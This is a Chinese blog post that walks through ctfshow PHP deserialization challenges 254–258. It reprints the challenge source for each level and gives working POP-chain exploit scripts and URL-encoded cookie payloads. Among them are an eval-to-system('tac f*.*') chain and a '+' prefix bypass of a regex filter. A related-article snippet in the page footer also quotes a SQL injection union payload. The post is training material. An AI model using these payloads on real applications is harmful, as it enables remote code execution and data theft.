ctfshow-反序列化关卡详解分析

已于 2022-05-13 21:40:47 修改
阅读量1k 收藏 2
点赞数 4
于 2022-05-09 22:14:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FreyZzz/article/details/124675529
版权

PHP 反序列化 漏洞利用 安全防护 命令执行
关键词由CSDN通过智能技术生成

254-对象引用执行逻辑

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        if($this->username===$u&&$this->password===$p){
            $this->isVip=true;
        }
        return $this->isVip;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

//分析:
if(isset($username) && isset($password)){
        //isset判断函数是否为空,进入下一步
    $user = new ctfShowUser();
        //调用ctfShowUser
    if($user->login($username,$password)){
        //调用$user(即ctfShowUser())的login类,为真进入下一步
        if($user->checkVip()){
        //调用$user 的checkVip()类
            $user->vipOneKeyGetFlag();
        //同上
        }
    }else{
        echo "no vip,no flag";
    }

条件:

1、调用对象 vipOneKeyGetFlag

2、isVip为真

payload:/?username=xxxxxx&password=xxxxxx

255-反序列化变量修改

class ctfShowUser
{
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
    public $isVip = false;

    public function checkVip()
    {
        return $this->isVip;
    }

    public function login($u, $p)
    {
        return $this->username === $u && $this->password === $p;
    }

    public function vipOneKeyGetFlag()
    {
        if ($this->isVip) {
            global $flag;
            echo "your flag is " . $flag;
        } else {
            echo "no vip, no flag";
        }
    }
}

$username = $_GET['username'];
$password = $_GET['password'];

if (isset($username) && isset($password)) {
    $user = unserialize($_COOKIE['user']);
    //$user是COOKIE反序列化后的值,其他的与上题思路一致

    if ($user->login($username, $password)) {
        if ($user->checkVip()) {
            $user->vipOneKeyGetFlag();
        }
    } else {
        echo "no vip,no flag";
    }
}

条件:

1、调用对象 vipOneKeyGetFlag

2、isVip为真

分析:

与254不同,这题login类调用成功 $isVip 也还是 false

所以就需要POP链构造

POP链: 
class ctfShowUser
{
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
    public $isVip = true;
}

$a = new ctfShowUser();
echo urlencode(serialize($a));
//这里需要url编码一下,不然可能出错

 payload:

GET /?username=xxxxxx&password=xxxxxxCookie:user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

256-反序列化参数修改

class ctfShowUser
{
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
    public $isVip = false;

    public function checkVip()
    {
        return $this->isVip;
    }

    public function login($u, $p)
    {
        return $this->username === $u && $this->password === $p;
    }

    public function vipOneKeyGetFlag()
    {
        if ($this->isVip) {
            global $flag;
            if ($this->username !== $this->password) {
                echo "your flag is " . $flag;
            }
        } else {
            echo "no vip, no flag";
        }
    }
}

$username = $_GET['username'];
$password = $_GET['password'];

if (isset($username) && isset($password)) {
    $user = unserialize($_COOKIE['user']);
    if ($user->login($username, $password)) {
        if ($user->checkVip()) {
            $user->vipOneKeyGetFlag();
        }
    } else {
        echo "no vip,no flag";
    }
}

分析:

与256基本一致,只是vipOneKeyGetFlag()下改了 $this->username !== $this->password 让u p不同
 

POP链构造

class ctfShowUser
{
    public $username = 'x';
    public $password = 'y';
    public $isVip = true;
}

$a = new ctfShowUser();
echo urlencode(serialize($a));

payload:

GET /?username=x&password=y

Cookie:user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22x%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%22y%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

257-反序列化参数修改&对象调用逻辑 

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

分析:

从这题开始难度提升,与之前的不同,flag.php不能直接输出,有关键字eval,可以使用命令执行


exp:

class ctfShowUser
{
    private $username = 'xxxxxx';
    private $password = 'xxxxxx';
    private $isVip = false;
    private $class;

    public function __construct()
    {
        $this->class = new backDoor();
    }


}


class backDoor
{
    private $code='system("tac f*.*");';

    public function getInfo()
    {
        eval($this->code);
    }
}

$a = new ctfShowUser();
echo urlencode(serialize($a));

payload:

GET /?username=xxxxxx&password=xxxxxx

Cookie:user=O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A21%3A%22%00ctfShowUser%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A21%3A%22%00ctfShowUser%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A18%3A%22%00ctfShowUser%00isVip%22%3Bb%3A0%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A19%3A%22system%28%22tac+f%2A.%2A%22%29%3B%22%3B%7D%7D

258-反序列化参数修改&对象调用逻辑

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    public $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    public $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }
    $user->login($username,$password);
}

分析:

与上一题基本一致,只是Cookie接收的地方出现过滤,OC后面的数字都被过滤,因为代码逻辑中1和+1含义一致,所以可以用+号绕过。

exp:

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';

    public function __construct(){
        $this->class=new backDoor();
    }

}

class backDoor{
    public $code="system('tac f*.*');";
    public function getInfo(){
        eval($this->code);
    }
}

$a = serialize(new ctfShowUser());
$b=str_replace('11','+11',$a);
$b=str_replace('8','+8',$b);
echo urlencode($b);

payload:

Cookie:user=O%3A%2B11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A%2B8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A%2B8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A0%3Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A19%3A%22system%28%27tac+f%2A.%2A%27%29%3B%22%3B%7D%7D

柯北Sec
关注
Web安全--反序列化漏洞详解php篇)
bobo_milk的博客
11-29 1215
反序列化
反序列化漏洞-02】PHP反序列化漏洞实验详解
cc
03-02 2860
序列化:程序将对象状态转换为可存储或传输的字节序列的过程(即对象状态转换为可存储或者可传输的过程){序列化是对象转换为字符串的过程}反序列化:程序把存储或传输的字节序列恢复为对象的过程。{反序列化则是字符串转化为对象的过程}如果字符串客户端可控,就会造成web应用反序列化任意对象,严重的是在反序列化的过程中会触发一些可以执行的php代码,例如phpinfoPHP中的序列化与反序列化,基本都是围绕和两个函数展开的。在介绍这两个函数之前,我们可以先看一个简单的例子。
ctfshow web入门 反序列化 前篇 254-266
m0_64815693的博客
04-08 1821
ctfshow web入门 反序列化 254-278
CTFshow刷题日记-WEB-反序列化篇(上,254-263)
Love&Share
09-22 2988
反序列化 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
ctfshow web入门 web254——— 反序列化wp
最新发布
2202_75289892的博客
08-20 1337
代码审计:定义了ctfShoeUser类get传参username和password,isset()是检查变量是否被定义的函数,若变量被定义且值不是null,那么返回值是true,接着实例化对象user.....最终输出flag所以我们传入的参数只要是已经被定义的值就行?
ctfshow web入门 反序列化
2301_79442654的博客
03-24 682
分析代码:如果用户名和密码参数都存在,脚本会创建一个类的实例$user。接着,调用方法尝试登录。如果登录成功(即用户名和密码与类中的默认值匹配),并且用户被标记为VIP($isVip为true),则调用方法输出$flag的值。如果登录失败或用户不是VIP,脚本将输出 "no vip, no flag"。要让程序返回true需要确保通过GET请求传递的用户名和密码与 ctfShowUser 类中定义的默认用户名和密码相匹配。默认的用户名和密码都是 'xxxxxx'。
ctf-show,web入门,反序列化254~267
2301_80548709的博客
03-23 1061
而%user变量后接了一个反序列化的函数,我们只需要写一个脚本,将创建类的将本序列化,传给cookie,同时注意到,源程序种没有将isVip更改的函数,所以序列化时这里也要注意,最后将其转码为url编码即可使用。
CTFshow-WEB入门-SQL注入(上)
feng的博客
02-05 2639
web171 无任何过滤,直接注就完事了。 ' union select 1,2,group_concat(password) from ctfshow_user-- - web172 ' union select 1,group_concat(password) from ctfshow_user2--+ web173 ' union select 1,2,group_concat(password) from ctfshow_user3-- - 虽然对返回的结果进行了过滤flag,但是flag是u
weblogic--反序列化漏洞测试Test
10-19
3. **CVE漏洞编号**:WebLogic反序列化漏洞往往与特定的CVE(Common Vulnerabilities and Exposures)编号相关,比如CVE-2015-4852、CVE-2017-10271等。这些漏洞影响了WebLogic的不同版本,了解具体受影响的版本有助...
65-65.渗透测试-反序列化漏洞的出现.mp4
05-10
65-65.渗透测试-反序列化漏洞的出现.mp4
PHP反序列化漏洞详解.rar
02-07
反序列化一个对象时,会调用类的`__wakeup()`或`__construct()`魔术方法,如果这些方法没有正确实现,可能导致安全问题。 **4. 漏洞利用** 攻击者通常会构造特殊的序列化字符串,使得在反序列化过程中,能够触发未...
CTFSHOW 反序列化
热门推荐
羽的博客
12-11 1万+
web254 没搞懂和反序列化有啥关系,直接传username=xxxxxx&password=xxxxxx出flag web255 请求包内容如下 首先get传的username和password都是xxxxxx 因为源码里面 $user = unserialize($_COOKIE['user']); $user->login($username,$password); 就是是说我们需要让反序列后的结果是ctfShowUser的实例化对象。又因为只有$this->isVip是tr
ctfshow web入门 序列化
Lumos427的博客
02-25 1544
序列化和反序列化 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-&gt
ctfshow php反序列化
m0_74940843的博客
11-12 287
序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化php 将数据序列化和反序列化会用到两个函数serialize 将对象格式化成有序的字符串unserialize 将字符串还原成原来的对象序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。常用的魔术方法。
ctfshow-web256(反序列化)
m0_62094846的博客
02-23 623
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__FILE__.
[BUUCTF] 备赛刷题第一天
Dannie01的博客
11-01 2258
[极客大挑战 2019]RCE ME Wallbreaker_Easy 绕过disabled function 狠简单 一把嗦 [SUCTF 2019]EasyWeb <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_ex
ctfshow反序列化
wz0819529的博客
10-21 861
web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com ​ */ ​ error_reporting(0); highlight_fi..
ctfshow 反序列化
m0_62422842的博客
07-07 1932
涉及到的题目是web254~web266
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值